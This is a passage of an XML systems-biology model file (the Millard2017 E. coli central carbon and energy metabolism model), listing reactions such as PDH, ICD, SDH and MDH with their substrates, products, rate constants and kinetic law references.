<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:56:51Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_17" stoichiometry="1"/>
<Substrate metabolite="Metabolite_18" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_19" stoichiometry="1"/>
<Product metabolite="Metabolite_27" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4959" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4959"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_17"/>
<SourceParameter reference="Metabolite_18"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_24" name="PDH" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_24">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:47:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_54" stoichiometry="1"/>
<Substrate metabolite="Metabolite_18" stoichiometry="1"/>
<Substrate metabolite="Metabolite_27" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_0" stoichiometry="1"/>
<Product metabolite="Metabolite_19" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4958" name="k1" value="0.1"/>
<Constant key="Parameter_4957" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4958"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_54"/>
<SourceParameter reference="Metabolite_18"/>
<SourceParameter reference="Metabolite_27"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4957"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_0"/>
<SourceParameter reference="Metabolite_19"/>
<SourceParameter reference="Metabolite_55"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_25" name="GLT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_25">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:45:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_0" stoichiometry="1"/>
<Substrate metabolite="Metabolite_22" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_5" stoichiometry="1"/>
<Product metabolite="Metabolite_54" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4956" name="k1" value="0.1"/>
<Constant key="Parameter_4955" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4956"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_0"/>
<SourceParameter reference="Metabolite_22"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4955"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_5"/>
<SourceParameter reference="Metabolite_54"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_26" name="ACN_1" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_26">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T20:01:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_5" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4954" name="k1" value="0.1"/>
<Constant key="Parameter_4953" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4954"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_5"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4953"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_1"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_27" name="ACN_2" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_27">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:56:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_1" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_15" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4952" name="k1" value="0.1"/>
<Constant key="Parameter_4951" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4952"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_1"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4951"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_15"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_28" name="ICD" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_28">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T09:23:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_15" stoichiometry="1"/>
<Substrate metabolite="Metabolite_20" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_3" stoichiometry="1"/>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4950" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4950"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_15"/>
<SourceParameter reference="Metabolite_20"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_29" name="LPD" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_29">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T17:04:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_54" stoichiometry="1"/>
<Substrate metabolite="Metabolite_3" stoichiometry="1"/>
<Substrate metabolite="Metabolite_18" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_19" stoichiometry="1"/>
<Product metabolite="Metabolite_34" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4949" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4949"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_54"/>
<SourceParameter reference="Metabolite_3"/>
<SourceParameter reference="Metabolite_18"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_30" name="SK" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_30">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:20:56Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_50" stoichiometry="1"/>
<Substrate metabolite="Metabolite_34" stoichiometry="1"/>
<Substrate metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_52" stoichiometry="1"/>
<Product metabolite="Metabolite_54" stoichiometry="1"/>
<Product metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4948" name="k1" value="0.1"/>
<Constant key="Parameter_4947" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4948"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_34"/>
<SourceParameter reference="Metabolite_56"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4947"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_54"/>
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_31" name="SDH" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_31">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T15:38:25Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_67" stoichiometry="1"/>
<Substrate metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_10" stoichiometry="1"/>
<Product metabolite="Metabolite_68" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4946" name="k1" value="0.1"/>
<Constant key="Parameter_4945" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4946"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_67"/>
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4945"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_10"/>
<SourceParameter reference="Metabolite_68"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_32" name="FUMA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_32">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-07T12:23:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_10" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_17" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4944" name="k1" value="0.1"/>
<Constant key="Parameter_4943" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4944"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_10"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4943"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_17"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_33" name="MQO" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_33">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:57:52Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_17" stoichiometry="1"/>
<Substrate metabolite="Metabolite_28" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_22" stoichiometry="1"/>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4942" name="k1" value="0.1"/>
<Constant key="Parameter_4941" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4942"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_17"/>
<SourceParameter reference="Metabolite_28"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4941"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_22"/>
<SourceParameter reference="Metabolite_29"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_34" name="MDH" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_34">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:59:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_29" stoichiometry="1"/>
<Substrate metabolite="Metabolite_22" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_17" stoichiometry="1"/>
<Product metabolite="Metabolite_28" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4940" name="k1" value="0.1"/>
<Constant key="Parameter_4939" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4940"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_29"/>
<SourceParameter reference="Metabolite_22"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4939"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_17"/>
<SourceParameter reference="Metabolite_28"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_35" name="ACEA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_35">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T10:03:15Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_15" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_14" stoichiometry="1"/>
<Product metabolite="Metabolite_33" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4938" name="k1" value="0.1"/>
<Constant key="Parameter_4937" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4938"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_15"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4937"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_14"/>
<SourceParameter reference="Metabolite_33"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_36" name="ACEB" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_36">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T11:32:16Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_0" stoichiometry="1"/>
<Substrate metabolite="Metabolite_14" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_54" stoichiometry="1"/>
<Product metabolite="Metabolite_17" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4936" name="k1" value="0.1"/>
<Constant key="Parameter_4935" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4936"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_0"/>
<SourceParameter reference="Metabolite_14"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4935"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_54"/>
<SourceParameter reference="Metabolite_17"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_37" name="ACEK_1" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_37">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:48:01Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
<Substrate metabolite="Metabolite_44" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_50" stoichiometry="1"/>
<Product metabolite="Metabolite_45" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4934" name="k1" value="0.1"/>
<Constant key="Parameter_4933" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4934"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_44"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4933"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_45"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_38" name="ACEK_2" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_38">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T19:48:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_45" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_44" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4932" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4932"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_45"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_39" name="EDD" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_39">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T19:07:17Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_26" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_16" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4931" name="k1" value="0.1"/>
<Constant key="Parameter_4930" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4931"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_26"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4930"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_16"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_40" name="EDA" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_40">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T19:06:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_16" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_12" stoichiometry="1"/>
<Product metabolite="Metabolite_27" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4929" name="k1" value="0.1"/>
<Constant key="Parameter_4928" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4929"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_16"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4928"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_12"/>
<SourceParameter reference="Metabolite_27"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_41" name="NDHI" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_41">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-26T16:30:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_19" stoichiometry="1"/>
<Substrate metabolite="Metabolite_28" stoichiometry="1"/>
<Substrate metabolite="Metabolite_64" stoichiometry="4"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_18" stoichiometry="1"/>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
<Product metabolite="Metabolite_73" stoichiometry="4"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4927" name="k1" value="0.1"/>
